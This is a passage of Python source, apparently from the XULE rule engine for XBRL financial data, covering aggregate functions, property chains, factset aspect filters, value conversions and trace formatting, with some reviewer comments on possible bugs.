            cleanup_function()
    return return_values
def evaluate_aggregate_function(function_ref, function_info, xule_context):
    '''Aggregation functions

    Aggregation functions perform 2 types of aggregation. The first is to collapse iterations generated from evaluating
    the arguments of the aggregation function. This is essentially the opposite of a for loop. The second is to combine
    the values generated from each argument.

    Returns a XuleValueSet with one aggregated value per alignment (plus an
    optional default value when there are no none-aligned results).
    '''
    # Evaluate each argument
    values_by_argument = list()
    for function_arg in function_ref['functionArgs']:
        # Each argument is evaluated on an isolated table so its iterations
        # collapse into a single value set.
        values_by_argument.append(isolated_evaluation(xule_context, function_ref['node_id'], function_arg))
    # Combine the value sets created from each argument
    # Get all alignments
    all_alignments = set()
    for arg_value_set in values_by_argument:
        for alignment in arg_value_set:
            all_alignments.add(alignment)
    # Go through each alignment and pull the values from each of the arguments
    values_by_alignment = collections.defaultdict(list)
    # The aligned_result_only and used_expressions need to be aggregated
    aligned_result_only_by_alignment = collections.defaultdict(lambda: False)
    used_expressions_by_alignment = collections.defaultdict(set)
    for alignment in all_alignments:
        values_by_alignment[alignment] = list()
        for arg_value_set in values_by_argument:
            if alignment in arg_value_set:
                arg_alignment = alignment
            else:
                # This will match none aligned values to aligned values (i.e. 1 and @Assets)
                arg_alignment = None
            for arg_value in arg_value_set.values[arg_alignment]:
                # Unbound values are excluded from the aggregated values.
                if arg_value.type != 'unbound':
                    values_by_alignment[alignment].append(arg_value)
                aligned_result_only_by_alignment[alignment] = aligned_result_only_by_alignment[alignment] or arg_value.aligned_result_only
                used_expressions_by_alignment[alignment].update((arg_value.used_expressions))
    # Go through each alignment and apply the aggregation function
    agg_values = XuleValueSet()
    # add default value if there are no None aligned results and the aggregation has a default value.
    if None not in values_by_alignment and function_info[FUNCTION_DEFAULT_VALUE] is not None:
        agg_values.append(
            XuleValue(xule_context, function_info[FUNCTION_DEFAULT_VALUE], function_info[FUNCTION_DEFAULT_TYPE]))
    for alignment in values_by_alignment:
        if len(values_by_alignment[alignment]) > 0:
            agg_value = function_info[FUNCTION_EVALUATOR](xule_context, values_by_alignment[alignment])
        else:
            # Add the default value if there is one
            if function_info[FUNCTION_DEFAULT_VALUE] is not None:
                agg_value = XuleValue(xule_context, function_info[FUNCTION_DEFAULT_VALUE],
                                      function_info[FUNCTION_DEFAULT_TYPE])
            else:
                agg_value = None
        if agg_value is not None:
            #if (aligned_result_only_by_alignment[alignment] and
            #    alignment is None and
            #    xule_context.iteration_table.current_table.current_alignment is None):
            #    agg_value = XuleValue(xule_context, None, 'unbound')
            #if (aligned_result_only_by_alignment[alignment] and
            #    alignment is None ):
            #    agg_value = XuleValue(xule_context, None, 'unbound')
            # Propagate the per-alignment bookkeeping onto the aggregated value.
            agg_value.alignment = alignment
            agg_value.aligned_result_only = aligned_result_only_by_alignment[alignment]
            # print("agg", function_ref['exprName'], function_ref['node_id'], len(xule_context.used_expressions), len(used_expressions))
            agg_value.used_expressions = used_expressions_by_alignment[alignment]
            agg_values.append(agg_value)
    return agg_values
def evaluate_property(property_expr, xule_context):
    """Evaluate a property expression.

    A property expression is an object followed by a chain of properties
    (i.e. Assets[]::concept::name::local-part). Each property in the chain is
    applied to the result of the previous one. If the current object is a set
    or list and the property does not itself operate on sets/lists, the
    property is applied element-wise and a new set/list is built from the
    results.

    Returns the XuleValue produced by the last property in the chain.
    """
    # The object_value is the left side of the property expression
    object_value = evaluate(property_expr['expr'], xule_context)
    for current_property_expr in property_expr['properties']:
        # Check that this is a valid property
        if current_property_expr['propertyName'] not in XuleProperties.PROPERTIES:
            raise XuleProcessingError(_("'%s' is not a valid property." % current_property_expr['propertyName']),
                                      xule_context)
        property_info = XuleProperties.PROPERTIES[current_property_expr['propertyName']]
        # Check if the property can operate on a set or list.
        if object_value.type not in ('set', 'list') or (object_value.type in ('set', 'list') and len(
                {'set', 'list'} & set(property_info[XuleProperties.PROP_OPERAND_TYPES])) > 0):
            # Either the object is not a collection, or the property handles
            # collections directly. (Removed a stray dead 'pass' statement here.)
            object_value = process_property(current_property_expr, object_value, property_info, xule_context)
        else:
            # This is a set or list. The property is not for a set or list, so try to create a new set or list after applying the property to the members.
            if object_value.type == 'set':
                new_list = set()
                new_shadow = set()
            else:
                new_list = list()
                new_shadow = list()
            for item in object_value.value:
                new_value = process_property(current_property_expr, item, property_info, xule_context)
                if object_value.type == 'set':
                    # Deduplicate set members by their shadow (plain Python) value.
                    if (new_value.shadow_collection if new_value.type in (
                            'set', 'list', 'dictionary') else new_value.value) not in new_shadow:
                        new_list.add(new_value)
                        new_shadow.add(new_value.shadow_collection if new_value.type in (
                            'set', 'list', 'dictionary') else new_value.value)
                else:  # list
                    new_list.append(new_value)
                    new_shadow.append(new_value.shadow_collection if new_value.type in (
                        'set', 'list', 'dictionary') else new_value.value)
            if object_value.type == 'set':
                object_value = XuleValue(xule_context, frozenset(new_list), 'set',
                                         shadow_collection=frozenset(new_shadow))
            else:  # list
                # BUG FIX: the shadow of a 'list' value must be a tuple to keep
                # order and duplicates - a frozenset here lost both (every other
                # 'list' XuleValue in this module uses a tuple shadow).
                object_value = XuleValue(xule_context, tuple(new_list), 'list', shadow_collection=tuple(new_shadow))
    return object_value
def process_property(current_property_expr, object_value, property_info, xule_context):
    """Apply a single property to an object value.

    Validates the object's type against the property's allowed operand types,
    checks the argument count, evaluates the property arguments, invokes the
    property function, and records any tag declared on the property
    expression.

    Returns the XuleValue produced by the property function (or the original
    unbound/none value when the property does not allow unbound objects).
    """
    # Check that the left object is the right type
    # if the left object is unbound then return unbound
    if not property_info[XuleProperties.PROP_UNBOUND_ALLOWED] and object_value.type in ('unbound', 'none'):
        return object_value
    else:
        # check the left object is the right type
        if len(property_info[XuleProperties.PROP_OPERAND_TYPES]) > 0:
            # Acceptable if the type matches, the object is a fact and 'fact'
            # is allowed, the object is castable to an allowed type, or the
            # object is none/unbound and the property allows unbound.
            if not (object_value.type in property_info[XuleProperties.PROP_OPERAND_TYPES] or
                    object_value.is_fact and 'fact' in property_info[XuleProperties.PROP_OPERAND_TYPES] or
                    any([xule_castable(object_value, allowable_type, xule_context) for allowable_type in
                         property_info[XuleProperties.PROP_OPERAND_TYPES]]) or
                    (object_value.type in ('none', 'unbound') and property_info[XuleProperties.PROP_UNBOUND_ALLOWED])):
                # print(current_property_expr['node_id'])
                raise XuleProcessingError(
                    _("Property '%s' is not a property of a '%s'.") % (current_property_expr['propertyName'],
                                                                       object_value.type),
                    xule_context)
        # property_info = XuleProperties.PROPERTIES[current_property_expr['propertyName']]
        # NOTE(review): property_args is only bound when PROP_ARG_NUM is not
        # None but is used unconditionally below - a property defined with a
        # None arg count would raise NameError. Confirm all property
        # definitions supply an argument count.
        if property_info[XuleProperties.PROP_ARG_NUM] is not None:
            property_args = current_property_expr.get('propertyArgs', [])
            # A non-negative PROP_ARG_NUM is an exact count; a negative value
            # means "no more than abs(count)" arguments.
            if property_info[XuleProperties.PROP_ARG_NUM] >= 0 and len(property_args) != property_info[
                    XuleProperties.PROP_ARG_NUM]:
                raise XuleProcessingError(
                    _("Property '%s' must have %s arguments. Found %i." % (current_property_expr['propertyName'],
                                                                           property_info[XuleProperties.PROP_ARG_NUM],
                                                                           len(property_args))),
                    xule_context)
            elif len(property_args) > property_info[XuleProperties.PROP_ARG_NUM] * -1 and property_info[
                    XuleProperties.PROP_ARG_NUM] < 0:
                raise XuleProcessingError(_(
                    "Property '%s' must have no more than %s arguments. Found %i." % (current_property_expr['propertyName'],
                                                                                      property_info[
                                                                                          XuleProperties.PROP_ARG_NUM] * -1,
                                                                                      len(property_args))),
                    xule_context)
        # prepare the arguments
        arg_values = []
        for arg_expr in property_args:
            arg_value = evaluate(arg_expr, xule_context)
            arg_values.append(arg_value)
        if len(property_info) > 4:  # There is property data
            object_value = property_info[XuleProperties.PROP_FUNCTION](xule_context, object_value,
                                                                       property_info[XuleProperties.PROP_DATA], *arg_values)
        else:
            object_value = property_info[XuleProperties.PROP_FUNCTION](xule_context, object_value, *arg_values)
        if 'tagName' in current_property_expr:
            xule_context.tags[current_property_expr['tagName']] = object_value
        return object_value
def evaluate_index(index_expr, xule_context):
    """Evaluate an index expression (list/dictionary subscripting).

    The left side is evaluated first; each index in the chain is then applied
    in turn, which supports nested indexing (e.g. x[1][2]).
    """
    indexed_value = evaluate(index_expr['expr'], xule_context)
    for index_ast in index_expr['indexes']:
        key_value = evaluate(index_ast, xule_context)
        # An index expression is used for lists and dictionaries.
        indexed_value = XuleProperties.property_index(xule_context, indexed_value, key_value)
    return indexed_value
def evaluate_tag_ref(tag_ref, xule_context):
    """Evaluate a tag reference.

    Looks the tag name up in the context's tags. If it is not there, the
    reference may be to a constant; a single-valued constant is calculated on
    demand and its value returned. If the tag cannot be resolved at all, a
    'none' value is returned.
    """
    if tag_ref['varName'] in xule_context.tags:
        return xule_context.tags[tag_ref['varName']]
    else:
        # The reference may be to a constant
        cat_const = xule_context.global_context.catalog['constants'].get(tag_ref['varName'])
        if cat_const is not None:
            ast_const = xule_context.global_context.rule_set.getItem(cat_const)
            # If the constant is iterable and it was never used in the rule body, it cannot be calculated for the message.
            # There would be no way to determine which value to use.
            if ast_const['number'] == 'single':
                const_info = xule_context.find_var(tag_ref['varName'], ast_const['node_id'])
                if const_info['type'] == xule_context._VAR_TYPE_CONSTANT:
                    if not const_info.get('calculated'):
                        # NOTE(review): var_value is unused - evaluate() is
                        # presumably called for its side effect of calculating
                        # the constant and populating const_info['value'].
                        # Confirm before removing this line.
                        var_value = evaluate(ast_const, xule_context)
                    return const_info['value'].values[None][0]
        # If here the tag could not be found
        return XuleValue(xule_context, None, 'none')
# aspect info indexes
# Positions within an aspect-info key tuple (see process_factset_aspects for
# how these tuples are built).
TYPE = 0
ASPECT = 1
SPECIAL_VALUE = 2
ASPECT_OPERATOR = 3
ASPECT_PROPERTY = 4
# Dispatch table mapping AST expression names ('exprName') to their evaluator
# functions. Commented entries are retained for historical reference.
EVALUATOR = {
    # rules
    "assertion": evaluate_assertion,
    "outputRule": evaluate_output_rule,
    # literals
    "boolean": evaluate_bool_literal,
    "integer": evaluate_int_literal,
    "float": evaluate_float_literal,
    "string": evaluate_string_literal,
    "period": evaluate_period_literal,
    "qname": evaluate_qname_literal,
    # "skip": evaluate_void_literal,
    "none": evaluate_void_literal,
    # atomic expressions
    "constantDeclaration": evaluate_constant_assign,
    "ifExpr": evaluate_if,
    "forExpr": evaluate_for,
    # "forControl": evaluate_for_control,
    # "forLoop": evaluate_for_loop,
    # "forBodyExpr": evaluate_for_body,
    # "withExpr": evaluate_with,
    "blockExpr": evaluate_block,
    "varRef": evaluate_var_ref,
    "tagRef": evaluate_tag_ref,
    "functionReference": evaluate_function_ref,
    "taggedExpr": evaluate_tagged,
    "propertyExpr": evaluate_property,
    "indexExpr": evaluate_index,
    "factset": evaluate_factset,
    "navigation": evaluate_navigate,
    "filter": evaluate_filter,
    # "dictExpr": evaluate_dict,
    # "listExpr": evaluate_list,
    # "setExpr": evaluate_set,
    # expressions with order of operations
    "unaryExpr": evaluate_unary,
    "inExpr": evaluate_in,
    "multExpr": evaluate_mult,
    "addExpr": evaluate_add,
    "intersectExpr": evaluate_intersect,
    "symetricDifferenceExpr": evaluate_symetric_difference,
    "compExpr": evaluate_comp,
    "notExpr": evaluate_not,
    "andExpr": evaluate_and,
    "orExpr": evaluate_or,
    # severity
    'severity': evaluate_severity,
    # aspect name literal
    'aspectName': evaluate_aspect_name,
    # balance
    'balance': evaluate_string_keyword,
    'periodType': evaluate_string_keyword,
}
# the position of the function information
# Indexes into a function-info tuple (used by evaluate_function_ref,
# regular_function and evaluate_aggregate_function).
FUNCTION_TYPE = 0
FUNCTION_EVALUATOR = 1
FUNCTION_ARG_NUM = 2
# aggregate only
FUNCTION_DEFAULT_VALUE = 3
FUNCTION_DEFAULT_TYPE = 4
# non aggregate only - note these reuse positions 3 and 4, so which meaning
# applies depends on FUNCTION_TYPE.
FUNCTION_ALLOW_UNBOUND_ARGS = 3
FUNCTION_RESULT_NUMBER = 4
def built_in_functions():
    """Return the dictionary of built in xule functions."""
    return XuleFunctions.BUILTIN_FUNCTIONS
# Module-level alias for the built in function table.
BUILTIN_FUNCTIONS = XuleFunctions.BUILTIN_FUNCTIONS
def process_factset_aspects(factset, xule_context):
    """Build list of aspects as described in the factset

    This function returns 3 dictionaries.
    1. A dictionary of aspect filters that will not be included in the alignment. These are indicated with @ (single) in the factset expression.
    2. A dictionary of aspect filters that will be included in the alignment. These are indicated with @@ (double) in the factset expression.
    3. A dictionary of variables based on aspect aliases.

    The aspect filters dictionaries (the first 2 dictionaries) are keyed by a tuple of 5 items:
    1. aspect type - This is either 'builtin' or 'explicit_dimension'
    2. aspect name - For built in aspects it is one of 'concept', 'entity', 'period', 'unit' or 'cube'
                     For dimensional aspects it is the qname of the dimension
    3. special value - If the aspect uses a wildcard, this will contain the wildcard character '*'. Otherwise it is None.
    4. aspect operator - This is the operator used for the filter. It is one of '=', '!=', 'in' or 'not in'. If there is no aspect operator
                         the value is None.
    5. aspect properties - This is a tuple. The first item is the property name and second item is a list of evaluated tuple of arguments.

    The value of the key is the evaluated expression on the right of the aspect operator. If there is no operator, then the value is None.

    The dictionary of aspect variables is keyed by the alias name. The value is a tuple of 3 items:
    1. aspect type - This is either 'builtin' or 'explicit_dimension'
    2. aspect name - For built in aspects it is one of 'concept', 'entity', 'period', 'unit' or 'cube'
                     For dimensional aspects it is the qname of the dimension
    3. aspect index - This is the node_id of the aspect filter.
    """
    non_align_aspects = {}
    align_aspects = {}
    aspect_vars = {}
    alternate_notation = False
    '''COULD CHECK FOR DUPLICATE ASPECTS IN THE FACTSET'''
    for aspect_filter in factset.get('aspectFilters', list()):
        # Set the dictionary to use based on if the aspect is covered (single @ - non aligned) vs. uncovered (double @@ - aligned)
        aspect_dictionary = non_align_aspects if aspect_filter['coverType'] == 'covered' else align_aspects
        aspect_var_name = aspect_filter.get('alias')
        # evaluate the aspectName
        aspect_name = evaluate(aspect_filter['aspectName'], xule_context)
        if aspect_name.type == 'aspect_name':
            # This is a built in aspect - one of concept, period, entity, unit or table
            add_aspect_var(aspect_vars, 'builtin', aspect_name.value, aspect_var_name,
                           aspect_filter['node_id'], xule_context)
            if aspect_name.value == 'concept' and alternate_notation:
                raise XuleProcessingError(_(
                    "The factset specifies the concept aspect as both @{0} and @concept={0}. Only one method should be used".format(
                        aspect_name.value)), xule_context)
            aspect_info, aspect_value = process_aspect_expr(aspect_filter, 'builtin', aspect_name.value, xule_context)
            if aspect_info is not None:
                aspect_dictionary[aspect_info] = aspect_value
        elif aspect_name.type == 'qname':
            # This is either a dimension aspect or the default concept aspect. The aspect name is determined by evaluating the aspectDimensionName
            # Get the model concept to determine if the aspect is a dimension
            aspect_filter_model_concept = xule_context.model.qnameConcepts.get(aspect_name.value)
            if aspect_filter_model_concept is None:
                raise XuleProcessingError(
                    _("Error while processing factset aspect. Concept %s not found." % aspect_name.value.clarkNotation),
                    xule_context)
            if aspect_filter_model_concept.isDimensionItem:
                # This is a dimension aspect
                add_aspect_var(aspect_vars, 'explicit_dimension', aspect_name.value, aspect_var_name,
                               aspect_filter['node_id'], xule_context)
                aspect_info, aspect_value = process_aspect_expr(aspect_filter, 'explicit_dimension', aspect_name.value,
                                                                xule_context)
                if aspect_info is not None:
                    aspect_dictionary[aspect_info] = aspect_value
            else:
                # This is a concept aspect and the filter name is really the aspect value (i.e. @Assets)
                if aspect_in_filters('builtin', 'concept', aspect_dictionary):
                    raise XuleProcessingError(_(
                        "The factset specifies the concept aspect as both @{0} and @concept={0}. Only one method should be used".format(
                            aspect_name.value)), xule_context)
                alternate_notation = True  # Indicate that the concept aspect is provided
                aspect_dictionary[('builtin', 'concept', None, '=', None)] = aspect_name
                add_aspect_var(aspect_vars, 'builtin', 'concept', aspect_var_name, aspect_filter['node_id'],
                               xule_context)
        else:
            raise XuleProcessingError(_(
                "An aspect name must be one of 'concept', 'unit', 'period', 'entity' or a dimension qname, found '{}'.".format(
                    aspect_name.type)), xule_context)
    # Legacy implementation retained for reference:
    #     aspect_filter_qname = evaluate(aspect_filter.aspectName.qName, xule_context).value
    #     #verify that lineItem is not used in both forms of the notation, i.e. Assets[lineItem=Liabilities].
    #     aspect_var_name = aspect_filter.get('aspectVar')
    #     if aspect_filter_qname.prefix is None and aspect_filter_qname.localName in BUILTIN_ASPECTS:
    #         #the aspect is builtin
    #         if aspect_filter_qname.localName == 'concept' and alternate_notation:
    #             XuleProcessingError(_("The factset specifies the lineItem both outside and inside the factset."), xule_context)
    #
    #         if aspect_filter.get('all'):
    #             aspect_info = ('builtin', aspect_filter_qname.localName, aspect_filter.all, aspect_filter.aspectOperator)
    #             non_align_aspects[aspect_info] = XuleValue(xule_context, None, 'none')
    #             add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
    #         elif aspect_filter.get('void'):
    #             non_align_aspects[('builtin', aspect_filter_qname, 'none', aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
    #             add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
    #         else:
    #             aspect_info = ('builtin', aspect_filter_qname.localName, None, aspect_filter.aspectOperator)
    #             non_align_aspects[aspect_info] = evaluate(aspect_filter.aspectExpr[0], xule_context)
    #             add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
    #     else:
    #         #This is a dimensional aspect.
    #         if aspect_filter.get('all'):
    #             non_align_aspects[('explicit_dimension', aspect_filter_qname, aspect_filter.all, aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
    #             add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
    #         elif aspect_filter.get('void'):
    #             non_align_aspects[('explicit_dimension', aspect_filter_qname, 'none', aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
    #             add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
    #         else:
    #             if not(aspect_filter.get('aspectExpr')):
    #                 #There is no member. In this case the aspect may have varname, but it dones not participate in the non_align.
    #                 add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
    #             else:
    #                 member_rs = evaluate(aspect_filter.aspectExpr[0], xule_context)
    #                 non_align_aspects[('explicit_dimension', aspect_filter_qname, None, aspect_filter.aspectOperator)] = member_rs
    #                 add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
    return (non_align_aspects, align_aspects, aspect_vars)
def aspect_in_filters(aspect_type, aspect_name, filters):
    """Checks if an aspect is in the existing set of filters.

    Arguments:
        aspect_type (string): Either 'builtin' or 'dimension'
        aspect_name (string or qname): if 'builtin' this will be a string with values of 'concept', 'unit', 'period', 'entity' or 'cube', otherwise it is a qname
            of the dimensional aspect name.
        filters (dictionary): Dictionary of aspect filters keyed by 5-part tuples (type, name, ...).
    """
    # Only the first two parts of each filter key identify the aspect.
    return any(filter_type == aspect_type and filter_name == aspect_name
               for filter_type, filter_name, _x, _y, _z in filters)
def process_aspect_expr(aspect_filter, aspect_type, aspect_name, xule_context):
    """Process the expression on the right side of an aspect filter.

    Looks at the aspectExpr for the aspect filter (if there is one) and returns a 2 item
    tuple of the aspect_info key and the evaluated aspect expression value.

    Arguments:
        aspect_filter (dict): AST node for the aspect filter
        aspect_type (string): Either 'builtin' or 'explicit_dimension'
        aspect_name (string or qname): name of the aspect being filtered
        xule_context (XuleContext): The processing context
    """
    # Evaluate any property applied to the aspect; it becomes part of the aspect_info key.
    if 'propertyName' in aspect_filter:
        property_args = tuple(evaluate(arg, xule_context).value
                              for arg in aspect_filter.get('propertyArgs', tuple()))
        prop = (aspect_filter['propertyName'], property_args)
    else:
        prop = None

    if 'wildcard' in aspect_filter:
        if aspect_filter['aspectOperator'] not in ('=', '!='):
            raise XuleProcessingError(_("In a factset a '*' can only be used with '=' or '!=', found '{}'".format(
                aspect_filter['aspectOperator'] + ' *')), xule_context)
        if aspect_filter['aspectOperator'] == '=':
            # aspect = * : keep the wildcard marker in the key; there is no member to match.
            wildcard_info = (aspect_type, aspect_name, aspect_filter['wildcard'],
                             aspect_filter['aspectOperator'], prop)
            return (wildcard_info, XuleValue(xule_context, None, 'none'))
        # This is aspect_name != *. Really this is the fact does not have this aspect
        # (this aspect is in the default), so it is rewritten as '= none'.
        return ((aspect_type, aspect_name, None, '=', prop),
                XuleValue(xule_context, None, 'none'))

    # Not a wildcard.
    aspect_info = (aspect_type, aspect_name, None, aspect_filter.get('aspectOperator'), prop)
    if 'aspectExpr' not in aspect_filter:
        # There is nothing to filter, but the aspect info will be used for handling alignment.
        return (aspect_info, None)
    aspect_value = evaluate(aspect_filter['aspectExpr'], xule_context)
    if aspect_type == 'explicit_dimension':
        # A default member behaves the same as the dimension being absent.
        aspect_value = fix_for_default_member(aspect_name, aspect_value, xule_context)
    return (aspect_info, aspect_value)
def fix_for_default_member(dim, aspect_value, xule_context):
    '''If the member for an explicit dimension is the default member, change the value to none.'''
    default_name = XuleDimensionCube.dimension_defaults_by_name(xule_context.model).get(dim)
    if default_name is None:
        # The dimension has no default member; nothing to rewrite.
        return aspect_value

    def _swap_default(member):
        # Map a member that equals the dimension default to a 'none' value; keep others as-is.
        if member.type == 'concept':
            member_qname = member.value.qname
        elif member.type == 'qname':
            member_qname = member.value
        else:
            return member
        if member_qname == default_name:
            return XuleValue(xule_context, None, 'none')
        return member

    if aspect_value.type == 'set':
        return XuleValue(xule_context, frozenset(_swap_default(m) for m in aspect_value.value), 'set')
    if aspect_value.type == 'list':
        return XuleValue(xule_context, tuple(_swap_default(m) for m in aspect_value.value), 'list')
    return _swap_default(aspect_value)
def add_aspect_var(aspect_vars, aspect_type, aspect_name, var_name, aspect_index, xule_context):
    """Register an aspect variable for a factset, rejecting duplicate variable names."""
    if not var_name:
        # Aspect has no variable name; nothing to register.
        return
    if var_name in aspect_vars:
        raise XuleProcessingError(
            _("Found multiple aspects with same variable name '%s' in a factset." % (var_name)), xule_context)
    aspect_vars[var_name] = (aspect_type, aspect_name, aspect_index)
def convert_value_to_qname(value, xule_context):
    """Convert a xule value to a qname; None for none/unbound; error otherwise."""
    value_type = value.type
    if value_type == 'qname':
        return value.value
    if value_type == 'concept':
        # A concept value carries the qname on the model concept.
        return value.value.qname
    if value_type in ('unbound', 'none'):
        return None
    raise XuleProcessingError(
        _("The value for a line item or dimension must be a qname or concept, found '%s'." % value.type),
        xule_context)
def convert_value_to_role(value, xule_context):
    """Convert a xule value to a role URI.

    Accepts a string/uri (used directly), a qname (resolved as a short role name),
    a role object (its roleURI), or none/unbound (None). Anything else is an error.
    """
    value_type = value.type
    if value_type in ('string', 'uri'):
        return value.value
    if value_type == 'role':
        return value.value.roleURI
    if value_type == 'qname':
        return XuleUtility.resolve_role(value, 'role', xule_context.model, xule_context)
    if value_type in ('unbound', 'none'):
        return None
    raise XuleProcessingError(
        _("The value for a role or arc role must be a string, uri or short role name, found '%s'." % value.type),
        xule_context)
def convert_value_to_model_period(value, xule_context):
    """Convert a xule period value to the model's representation.

    The model stores instant and end dates as midnight of the NEXT day (python treats
    midnight as the beginning of the day), so values that did not come from the model
    are shifted forward by one day. Forever durations are returned unchanged.
    """
    if value.type in ('unbound', 'none'):
        return None
    if value.from_model:
        # Already in model form; no date adjustment needed.
        return value.value

    one_day = datetime.timedelta(days=1)
    if value.type == 'instant':
        return value.value + one_day
    if value.type == 'duration':
        if value.value[0] == datetime.datetime.min and value.value[1] == datetime.datetime.max:
            # this is forever, don't do anything
            return value.value
        return (value.value[0], value.value[1] + one_day)
    raise XuleProcessingError(
        _("Converting result to a period, expected 'instant' or 'duration' but found '%s'" % value.type),
        xule_context)
def convert_value_to_model_unit(value, xule_context):
    """Convert a xule value to a model unit tuple (numerator-measures, denominator-measures)."""
    if value.type == 'unit':
        return value.value
    if value.type == 'qname':
        # A xule 'unit' is a tuple of measure tuples; a bare qname is a simple numerator.
        return ((value.value,), tuple())
    # NOTE(review): any other type falls through and implicitly returns None — unlike the
    # sibling converters this does not raise; confirm callers rely on that.
# def get_used_vars(xule_context, var_ids):
# return {var_id: xule_context.vars.get(var_id) for var_id in var_ids}
def match_function_arguments(reference, declaration, xule_context):
    '''Match the arguments on the function reference (call) to the function declaration.

    Arguments:
        reference (dict): AST node of the function call (has 'functionName' and 'functionArgs')
        declaration (dict): AST node of the function declaration
        xule_context (XuleContext): The processing context

    Returns a list of matched arguments, each a dictionary with the declared name,
    node id, the call-site expression and whether the argument is tagged.
    Raises XuleProcessingError when the argument counts differ.
    '''
    reference_args = reference['functionArgs']
    declaration_args = declaration['functionArgs']
    if len(reference_args) != len(declaration_args):
        raise XuleProcessingError(_("Function call for '%s' has mismatched arguments." % reference['functionName']),
                                  xule_context)
    # Pair each declared argument with the corresponding call-site expression.
    return [{"name": decl_arg['argName'],
             "node_id": decl_arg['node_id'],
             "expr": ref_arg,
             "tagged": decl_arg.get('tagged', False)}
            for decl_arg, ref_arg in zip(declaration_args, reference_args)]
def remove_from_alignment(alignment, remove_aspects, xule_context):
    """Return a new frozenset alignment with the given aspect keys removed."""
    keys_to_remove = set(remove_aspects)
    return frozenset((aspect_key, member)
                     for aspect_key, member in alignment
                     if aspect_key not in keys_to_remove)
def alignment_to_aspect_info(alignment, xule_context):
    """Convert an alignment dictionary into an aspect-info dictionary.

    The input maps (type, aspect-name) keys to raw model values; the output maps
    5-part aspect_info keys (type, aspect-name, special, operator, property) to
    XuleValues, suitable for use as factset filters.
    """
    aspect_dict = {}
    for align_key, align_value in alignment.items():
        # All alignment entries become equality filters with no special value or property.
        aspect_info = (align_key[0], align_key[1], None, '=', None)
        if align_key[0] == 'builtin':
            if align_key[1] == 'concept':
                aspect_value = XuleValue(xule_context, align_value, 'qname')
            elif align_key[1] == 'unit':
                aspect_value = XuleValue(xule_context, align_value, 'unit')
            elif align_key[1] == 'period':
                period_value = align_value
                # A tuple is a duration (start, end); a single datetime is an instant.
                if isinstance(period_value, tuple):
                    if period_value[1] == datetime.datetime.max:
                        # this is forever
                        aspect_value = XuleValue(xule_context, period_value, 'duration', from_model=True)
                    else:
                        # need to adjust the end date
                        # aspect_value = XuleResultSet(XuleResult((period_value[0],
                        #                                          period_value[1] - datetime.timedelta(days=1))
                        #                                         ,'duration'))
                        # NOTE(review): despite the comment above, the end date is passed through
                        # unchanged here; from_model=True marks it as already in model form.
                        aspect_value = XuleValue(xule_context, (period_value[0],
                                                               period_value[1])
                                                 , 'duration',
                                                 from_model=True)
                else:
                    # need to adjust the date. This is from the model which handles midnight (end of day) as beginning of next day.
                    # aspect_value = XuleResultSet(XuleResult(period_value - datetime.timedelta(days=1), 'instant'))
                    aspect_value = XuleValue(xule_context, period_value, 'instant', from_model=True)
            elif align_key[1] == 'entity':
                aspect_value = XuleValue(xule_context, align_value, 'entity')
            else:
                raise XuleProcessingError(_("Unknown built in aspect '%s'" % align_key[1]), xule_context)
        elif align_key[0] == 'explicit_dimension':
            # Dimension members keep whatever xule type the model value maps to.
            aspect_value = XuleValue(xule_context, align_value, model_to_xule_type(xule_context, align_value))
        else:
            raise XuleProcessingError(_("Unknown aspect type '%s'" % align_key[0]), xule_context)
        aspect_dict[aspect_info] = aspect_value
    return aspect_dict
def sugar_trace(value, rule_part, xule_context):
    """Return a tuple of 'sugar' details for rule_part, used when formatting trace output."""
    part_name = rule_part['exprName']
    if part_name == 'forExpr':
        return (rule_part['forLoopExpr']['forVar'],)
    if part_name == 'varRef':
        return (rule_part['varName'],)
    if part_name == 'factset':
        # The evaluated value itself is the interesting bit for factsets.
        return (value,)
    if part_name == 'functionReference':
        function_info = xule_context.find_function(rule_part['functionName'])
        if function_info is None:
            return (rule_part['functionName'], tuple())
        declared_args = tuple(arg.argName
                              for arg in function_info['function_declaration']['functionArgs'])
        return (rule_part['functionName'], declared_args)
    return tuple()
def format_trace(xule_context):
    """Render the accumulated trace steps as one indented line per step."""
    rendered_steps = []
    for step in xule_context.trace:
        # step: (indent-level, expr-name, sugar, value)
        rendered_steps.append(" " * step[0]
                              + step[3].format_value()
                              + format_trace_info(step[1], step[2], {}, xule_context))
    if not rendered_steps:
        return ""
    return "\n".join(rendered_steps) + "\n"
def format_trace_info(expr_name, sugar, common_aspects, xule_context):
    """Build the descriptive ' - ...' suffix for one trace line (empty string if nothing)."""
    # Expressions whose description is a fixed label.
    fixed_labels = {'ifExpr': 'if',
                    'addExpr': 'add/subtract',
                    'multExpr': 'multiply/divide',
                    'compExpr': 'comparison',
                    'andExpr': 'and',
                    'orExpr': 'or'}
    if expr_name == 'forExpr':
        trace_info = 'for ($%s)' % sugar[0]
    elif expr_name == 'varRef':
        trace_info = 'var ($%s)' % sugar[0]
    elif expr_name == 'functionReference':
        call_args = ",".join(sugar[1]) if len(sugar[1]) > 0 else "..."
        trace_info = '%s(%s)' % (sugar[0], call_args)
    elif expr_name == 'property':
        trace_info = "::%s" % sugar[0]
    elif expr_name == 'factset':
        if sugar[0].fact is not None:
            # Show only the aspects that differ from the common ones.
            fact_context = get_uncommon_aspects(sugar[0].fact, common_aspects, xule_context)
            trace_info = 'factset '
            if ('builtin', 'concept') not in fact_context:
                trace_info += str(sugar[0].qname) + " "
            trace_info += format_alignment(fact_context, xule_context)
        else:
            trace_info = expr_name
    elif expr_name in fixed_labels:
        trace_info = fixed_labels[expr_name]
    else:
        # Unknown expression types fall back to their raw name.
        trace_info = expr_name
    return " - " + trace_info if len(trace_info) > 0 else trace_info
